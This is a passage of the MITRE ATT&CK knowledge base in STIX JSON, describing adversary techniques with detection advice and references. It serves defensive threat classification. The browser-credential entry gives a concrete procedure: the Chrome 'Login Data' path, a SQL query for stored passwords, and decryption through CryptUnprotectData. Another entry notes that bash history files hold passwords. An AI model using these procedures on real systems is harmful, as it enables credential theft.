Retrieved August 4, 2023.", "url": "https://github.com/pushsecurity/saas-attacks/blob/main/techniques/webhooks/description.md"}, {"source_name": "RedHat Webhooks", "description": "RedHat. (2022, June 1). What is a webhook?. Retrieved July 20, 2023.", "url": "https://www.redhat.com/en/topics/automation/what-is-a-webhook"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Bash History", "description": "Bash keeps track of the commands users type on the command-line with the \"history\" utility. Once a user logs out, the history is flushed to the user\u2019s .bash_history file. For each user, this file resides at the same location: ~/.bash_history. Typically, this file keeps track of the user\u2019s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Attackers can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_detection": "Monitoring when the user's .bash_history is read can help alert to suspicious activity. While users do typically rely on their history of commands, they often access this history through other utilities like \"history\" instead of commands like cat ~/.bash_history.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--44dca04b-808d-46ca-b25f-d85236d4b9f8", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1139", "external_id": "T1139"}, {"source_name": "External to DA, the OS X Way", "description": "Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017.", "url": "http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-11-08T14:00:00.188Z", "name": "Traffic Signaling", "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}, {"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "command-and-control"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Tony Lee", "Josh Day, Gigamon"], "x_mitre_deprecated": false, "x_mitre_detection": "Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows.\n\nThe Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN)", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows", "Network"], "x_mitre_version": "2.4", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Defensive network service scanning"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--451a9977-d255-43c9-b431-66de80130c8c", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1205", "external_id": "T1205"}, {"source_name": "Bleeping Computer - Ryuk WoL", "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021.", "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/"}, {"source_name": "AMD Magic Packet", "description": "AMD. (1995, November 1). Magic Packet Technical White Paper. Retrieved February 17, 2021.", "url": "https://www.amd.com/system/files/TechDocs/20213.pdf"}, {"source_name": "Mandiant - Synful Knock", "description": "Bill Hau, Tony Lee, Josh Homan. (2015, September 15). SYNful Knock - A Cisco router implant - Part I. Retrieved October 19, 2020.", "url": "https://www.mandiant.com/resources/synful-knock-acis"}, {"source_name": "Cisco Synful Knock Evolution", "description": "Graham Holmes. (2015, October 8). Evolution of attacks on Cisco IOS devices. Retrieved October 19, 2020.", "url": "https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices"}, {"source_name": "Hartrell cd00r 2002", "description": "Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible backdoor. Retrieved October 13, 2018.", "url": "https://www.giac.org/paper/gcih/342/handle-cd00r-invisible-backdoor/103631"}, {"source_name": "Cisco Blog Legacy Device Attacks", "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020.", "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954"}, {"source_name": "GitLab WakeOnLAN", "description": "Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February 17, 2021.", "url": "https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2023-10-27T18:32:11.219Z", "name": "Direct Cloud VM Connections", "description": "Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System Manager.(Citation: AWS System Manager).\n\nMethods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access. \n\nAdversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console) These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "lateral-movement"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Thanabodi Phrakhun, @naikordian"], "x_mitre_deprecated": false, "x_mitre_detection": "", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["IaaS"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--45241b9e-9bbc-4826-a2cc-78855e51ca09", "created": "2023-06-02T15:27:55.412Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1021/008", "external_id": "T1021.008"}, {"source_name": "EC2 Instance Connect", "description": "AWS. (2023, June 2). Connect using EC2 Instance Connect. Retrieved June 2, 2023.", "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html"}, {"source_name": "AWS System Manager", "description": "AWS. (2023, June 2). What is AWS System Manager?. Retrieved June 2, 2023.", "url": "https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html"}, {"source_name": "lucr-3: Getting SaaS-y in the cloud", "description": "Ian Ahl. (2023, September 20). LUCR-3: Scattered Spider Getting SaaS-y In The Cloud. Retrieved September 20, 2023.", "url": "https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud"}, {"source_name": "SIM Swapping and Abuse of the Microsoft Azure Serial Console", "description": "Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced Attack. Retrieved June 2, 2023.", "url": "https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial"}, {"source_name": "Azure Serial Console", "description": "Microsoft. (2022, October 17). Azure Serial Console. Retrieved June 2, 2023.", "url": "https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-overview"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2022-04-25T14:00:00.188Z", "name": "Credentials from Web Browsers", "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser. (Citation: Talos Olympic Destroyer 2018) \n\nWeb browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\n\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim\u2019s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)\n \nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc. (Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017)\n\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\n\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "credential-access"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Ryan Benson, Exabeam", "Barry Shteiman, Exabeam", "Sylvain Gil, Exabeam", "RedHuntLabs, @redhuntlabs"], "x_mitre_detection": "Identify web browser files that contain credentials such as Google Chrome\u2019s Login Data database file: AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--4579d9c9-d5b9-45e0-9848-0104637b579f", "created": "2019-06-17T19:34:51.855Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1503", "external_id": "T1503"}, {"source_name": "Talos Olympic Destroyer 2018", "description": "Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer Takes Aim At Winter Olympics. Retrieved March 14, 2019.", "url": "https://blog.talosintelligence.com/2018/02/olympic-destroyer.html"}, {"source_name": "Microsoft CryptUnprotectData April 2018", "description": "Microsoft. (2018, April 12). CryptUnprotectData function. Retrieved June 18, 2019.", "url": "https://docs.microsoft.com/en-us/windows/desktop/api/dpapi/nf-dpapi-cryptunprotectdata"}, {"source_name": "Proofpoint Vega Credential Stealer May 2018", "description": "Proofpoint. (2018, May 10). New Vega Stealer shines brightly in targeted campaign . Retrieved June 18, 2019.", "url": "https://www.proofpoint.com/us/threat-insight/post/new-vega-stealer-shines-brightly-targeted-campaign"}, {"source_name": "FireEye HawkEye Malware July 2017", "description": "Swapnil Patil, Yogesh Londhe. (2017, July 25). HawkEye Credential Theft Malware Distributed in Recent Phishing Campaign. Retrieved June 18, 2019.", "url": "https://www.fireeye.com/blog/threat-research/2017/07/hawkeye-malware-distributed-in-phishing-campaign.html"}, {"source_name": "GitHub Mimikittenz July 2016", "description": "Jamieson O'Reilly (putterpanda). (2016, July 4). mimikittenz. Retrieved June 20, 2019.", "url": "https://github.com/putterpanda/mimikittenz"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2024-03-01T16:25:43.150Z", "name": "System Binary Proxy Execution", "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.\n\nSimilarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "3.2.0", "x_mitre_contributors": ["Nishan Maharjan, @loki248", "Hans Christoffer Gaardl\u00f8s", "Praetorian", "Wes Hurd"], "x_mitre_deprecated": false, "x_mitre_detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows", "Linux", "macOS"], "x_mitre_version": "3.1", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Anti-virus", "Application control", "Digital Certificate Validation"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", "created": "2018-04-18T17:59:24.739Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": false, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1218", "external_id": "T1218"}, {"source_name": "GTFO split", "description": "GTFOBins. (2020, November 13). split. Retrieved April 18, 2022.", "url": "https://gtfobins.github.io/gtfobins/split/"}, {"source_name": "LOLBAS Project", "description": "Oddvar Moe et al. (2022, February). Living Off The Land Binaries, Scripts and Libraries. Retrieved March 7, 2022.", "url": "https://github.com/LOLBAS-Project/LOLBAS#criteria"}, {"source_name": "split man page", "description": "Torbjorn Granlund, Richard M. Stallman. (2020, March null). split(1) \u2014 Linux manual page. Retrieved March 25, 2022.", "url": "https://man7.org/linux/man-pages/man1/split.1.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Source", "description": "**This technique has been deprecated and should no longer be used.**\n\nThe source command loads functions into the current shell or executes files in the current context. This built-in command can be run in two different ways source /path/to/filename [arguments] or .**This technique has been deprecated and should no longer be used.** /path/to/filename [arguments]. Take note of the space after the \".\". Without a space, a new shell is created that runs the program instead of running the program within the current context. This is often used to make certain features or functions available to a shell or to update a specific shell's environment.(Citation: Source Manual)\n\nAdversaries can abuse this functionality to execute programs. The file executed with this technique does not need to be marked executable beforehand.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "execution"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_deprecated": true, "x_mitre_detection": "Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS"], "x_mitre_version": "2.0", "x_mitre_permissions_required": ["User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--45d84c8b-c1e2-474d-a14d-69b5de0a2bc0", "created": "2017-12-14T16:46:06.044Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1153", "external_id": "T1153"}, {"source_name": "Source Manual", "description": "ss64. (n.d.). Source or Dot Operator. Retrieved May 21, 2019.", "url": "https://ss64.com/bash/source.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_contributors": [], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "DLL Search Order Hijacking", "description": "Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. \n\nAdversaries may perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program. Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. \n\nAdversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)\n\nIf a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program.\n\nPrograms that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}, {"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Stefan Kanthak", "Travis Smith, Tripwire"], "x_mitre_detection": "Monitor file systems for moving, renaming, replacing, or modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared with past behavior) that do not correlate with known software, patches, etc., are suspicious. Monitor DLLs loaded into a process and detect DLLs that have the same file name but abnormal paths. Modifications to or creation of .manifest and .local redirection files that do not correlate with software updates are suspicious.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_defense_bypassed": ["Process whitelisting"], "x_mitre_effective_permissions": ["User", "Administrator", "SYSTEM"], "x_mitre_permissions_required": ["User", "Administrator", "SYSTEM"], "x_mitre_system_requirements": ["Ability to add a DLL, manifest file, or .local file, directory, or junction."], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--46944654-fcc1-4f63-9dad-628102376586", "created": "2017-05-31T21:30:40.604Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1038", "external_id": "T1038"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/471.html", "external_id": "CAPEC-471"}, {"source_name": "Microsoft DLL Search", "description": "Microsoft. (n.d.). Dynamic-Link Library Search Order. Retrieved November 30, 2014.", "url": "http://msdn.microsoft.com/en-US/library/ms682586"}, {"source_name": "OWASP Binary Planting", "description": "OWASP. (2013, January 30). Binary planting. Retrieved June 7, 2016.", "url": "https://www.owasp.org/index.php/Binary_planting"}, {"source_name": "Microsoft 2269637", "description": "Microsoft. (2010, August 22). Microsoft Security Advisory 2269637 Released. Retrieved December 5, 2014.", "url": "https://msrc-blog.microsoft.com/2010/08/21/microsoft-security-advisory-2269637-released/"}, {"source_name": "Microsoft DLL Redirection", "description": "Microsoft. (n.d.). Dynamic-Link Library Redirection. Retrieved December 5, 2014.", "url": "http://msdn.microsoft.com/en-US/library/ms682600"}, {"source_name": "Microsoft Manifests", "description": "Microsoft. (n.d.). Manifests. Retrieved December 5, 2014.", "url": "https://msdn.microsoft.com/en-US/library/aa375365"}, {"source_name": "Mandiant Search Order", "description": "Mandiant. (2010, August 31). DLL Search Order Hijacking Revisited. Retrieved December 5, 2014.", "url": "https://www.mandiant.com/blog/dll-search-order-hijacking-revisited/"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2022-04-25T14:00:00.188Z", "name": "New Service", "description": "When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. \n\nAdversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "persistence"}, {"kill_chain_name": "mitre-attack", "phase_name": "privilege-escalation"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Pedro Harrison"], "x_mitre_detection": "Monitor service creation through changes in the Registry and common utilities using command-line invocation. Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017) (Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.\n\nMonitor processes and command-line arguments for actions that could create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": false, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Windows"], "x_mitre_version": "1.0", "x_mitre_effective_permissions": ["SYSTEM"], "x_mitre_permissions_required": ["Administrator", "SYSTEM"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--478aa214-2ca7-4ec0-9978-18798e514790", "created": "2017-05-31T21:30:45.613Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "revoked": true, "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1050", "external_id": "T1050"}, {"source_name": "capec", "url": "https://capec.mitre.org/data/definitions/550.html", "external_id": "CAPEC-550"}, {"source_name": "TechNet Services", "description": "Microsoft. (n.d.). Services. Retrieved June 7, 2016.", "url": "https://technet.microsoft.com/en-us/library/cc772408.aspx"}, {"source_name": "Microsoft 4697 APR 2017", "description": "Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service was installed in the system. Retrieved August 7, 2018.", "url": "https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697"}, {"source_name": "Microsoft Windows Event Forwarding FEB 2018", "description": "Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding to help with intrusion detection. Retrieved August 7, 2018.", "url": "https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection"}, {"source_name": "TechNet Autoruns", "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"], "x_mitre_data_sources": []}, {"modified": "2021-04-29T14:49:39.188Z", "name": "Timestomp", "description": "Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.\n\nTimestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], "x_mitre_attack_spec_version": "2.1.0", "x_mitre_contributors": ["Romain Dumont, ESET"], "x_mitre_detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.", "x_mitre_domains": ["enterprise-attack"], "x_mitre_is_subtechnique": true, "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "x_mitre_platforms": ["Linux", "macOS", "Windows"], "x_mitre_version": "1.0", "x_mitre_data_sources": [], "x_mitre_defense_bypassed": ["Host forensic analysis"], "x_mitre_permissions_required": ["root", "SYSTEM", "User"], "type": "attack-pattern", "spec_version": "2.1", "id": "attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611", "created": "2020-01-31T12:42:44.103Z", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "external_references": [{"source_name": "mitre-attack", "url": "https://attack.mitre.org/techniques/T1070/006", "external_id": "T1070.006"}, {"source_name": "WindowsIR Anti-Forensic Techniques", "description": "Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.", "url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html"}], "object_marking_refs": ["marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"]}, {"modified": "2024-02-09T18:49:08.428Z", "name": "Reflective Code Loading", "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk (e.g., [Shared Modules](https://attack.mitre.org/techniques/T1129)).\n\nReflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL) For example, the `Assembly.Load()` method executed by [PowerShell](https://attack.mitre.org/techniques/T1059/001) may be abused to load raw code into the running process.(Citation: Microsoft AssemblyLoad)\n\nReflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the \u201cinjection\u201d loads code into the processes\u2019 own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)", "kill_chain_phases": [{"kill_chain_name": "mitre-attack", "phase_name": "defense-evasion"}], 